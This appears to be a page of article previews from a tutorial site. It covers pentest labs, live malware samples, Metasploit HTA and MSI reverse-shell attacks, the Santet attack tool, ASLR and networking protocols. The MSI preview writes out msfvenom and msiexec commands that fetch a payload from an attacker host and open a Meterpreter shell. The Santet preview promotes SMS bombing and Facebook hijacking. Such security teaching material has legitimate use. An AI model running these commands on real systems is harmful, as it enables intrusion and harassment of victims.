MCA Articles
Page 55 of 94
Pentesting using Docker
You will learn how to configure a vulnerable web application (DVWA) with the help of Docker in easy steps. Docker is a third-party tool developed to create an isolated environment to execute any application. These applications are run using containers. These containers are unique because they bring together all the dependencies of an application into a single package and deploy it. Run these commands to install and configure it:
apt update
apt install docker.io
systemctl start docker
systemctl enable docker
Configure DVWA on Docker
Damn Vulnerable Web Application (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goal is to be an aid ...

TheZoo Repository Live Malware Analysis
theZoo allows the study of malware and enables people who are interested in malware analysis to have access to live malware, analyse the ways they operate, and maybe even enable advanced and savvy people to block specific malware within their own environment.
git clone https://github.com/ytisf/theZoo
cd theZoo
pip install --user -r requirements.txt
python theZoo.py
I recommend running them in a VM which has no internet connection (or an internal virtual network if you must) and without guest additions or any equivalents. Some of them are worms and will automatically try to spread out. Running them unconstrained means that you will infect yourself or others with ...

Hacking with HTA file (MSHTA.exe)
MSHTA.exe is the Windows OS utility responsible for running HTA (HTML Application) files, which we can run with JavaScript or VBScript. You can interpret these files using the Microsoft MSHTA.exe tool.
Metasploit contains the “HTA Web Server” module, which generates a malicious HTA file. This module hosts an HTML Application (HTA) that when opened will run a payload via PowerShell.
Malicious HTA file
Open Metasploit in Kali Linux and run the following commands to generate a malicious HTA file:
use exploit/windows/misc/hta_server
set srvhost 192.168.1.109
set lhost 192.168.1.109
exploit
Now run the malicious code on the target machine through mshta.exe on the victim’s machine to obtain meterpreter sessions.

Hacking with Santet
This article explains how to hack using the Santet tool, which has several different attacks built into one package. It allows you to create a payload, hijack a Facebook group, perform SMS bomber and SMS spoof attacks and, finally, a denial-of-service attack. Follow the instructions below to learn how to install Santet and use it further.
Turn on your Kali machine, open a terminal and type in
git clone https://github.com/Gameye98/santet-online
Now change your current directory to santet using the cd command:
cd santet-online
Now give execute permission to the santet.py file by executing this command:
chmod +x santet.py
Now run python santet.py as follows:
If everything ...

Get the Reverse Shell with MSI package
Windows OS comes installed with a Windows Installer engine which is used by MSI packages for the installation of applications. The executable program that interprets packages and installs products is Msiexec.exe.
Launch msiexec attack via msfvenom
Let’s generate an MSI package file (1.msi) utilizing the Windows Meterpreter payload as follows:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f msi > 1.msi
At the target end, the victim executes the 1.msi file on the remote machine with the following utility:
msiexec /q /i http://192.168.1.109/1.msi
The attacker gets the reverse shell of the victim machine by starting multi/handler as the listener.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.109
exploit

Address Space Layout Randomization (ASLR)
Memory corruption vulnerabilities have plagued software for decades, despite efforts by large companies like Apple, Google, and Microsoft to eradicate them. This article presents some basic facts about ASLR, focusing on the Windows implementation. In addition to covering what ASLR accomplishes to improve security posture, we aim to give defenders advice on how to improve the security of their software, and to give researchers more insight into how ASLR works and ideas for investigating its limitations.
Memory corruption vulnerabilities occur when a program mistakenly writes attacker-controlled data outside of an intended memory region or outside intended memory’s scope. This may crash ...

What is Carrier Sense Multiple Access (CSMA)?
Carrier Sense Multiple Access (CSMA) is a network protocol for carrier transmission that operates in the Medium Access Control (MAC) layer. It senses or listens to determine whether the shared channel for transmission is busy, and transmits if the channel is not busy. Using CSMA protocols, more than one user or node sends and receives data through a shared medium that may be a single cable or optical fiber connecting multiple nodes, or a portion of the wireless spectrum.
Working Principle
When a station has frames to transmit, it attempts to detect the presence of the carrier signal from the other nodes connected to ...

The IEEE 802.1Q Standard
The IEEE 802.1Q networking standard lays down the specifications for VLANs (Virtual Local Area Networks or Virtual LANs) on an IEEE 802.3 Ethernet network. The standard is generally referred to as Dot1Q. VLANs are logical groups of computers that appear to be on the same LAN irrespective of the configuration of the underlying physical network. Network administrators partition the networks to match the functional requirements of the VLANs so that each VLAN comprises a subset of ports on a single or multiple switches or bridges. This allows computers and devices in a VLAN to communicate in the simulated environment ...

Spanning Tree Protocol
Spanning Tree Protocol (STP) is a communication protocol operating at the data link layer of the OSI model to prevent bridge loops and the resulting broadcast storms. It creates a loop-free topology for Ethernet networks.
Working Principle
A bridge loop is created when there is more than one path between two nodes in a given network. When a message is sent, particularly when a broadcast is done, the bridges repeatedly rebroadcast the same message, flooding the network. Since a data link layer frame does not have a time-to-live field in the header, the broadcast frame may loop forever, thus swamping the channels.
Spanning ...

What is Wormhole switching?
In data communications, wormhole switching is a flow control technique where large data frames or packets are partitioned and then transmitted. When a switching device (a bridge or a switch) receives a data packet, it partitions the packet into small parts called flow control units or flits. The flits are transmitted one by one instead of the whole packet. Also called wormhole flow control, wormhole switching is a subtype of flit-buffer flow control methods and is based upon fixed links.
Working Principle
In this technique, each packet or frame is broken into smaller pieces of data called flits. The header flits contain the destination ...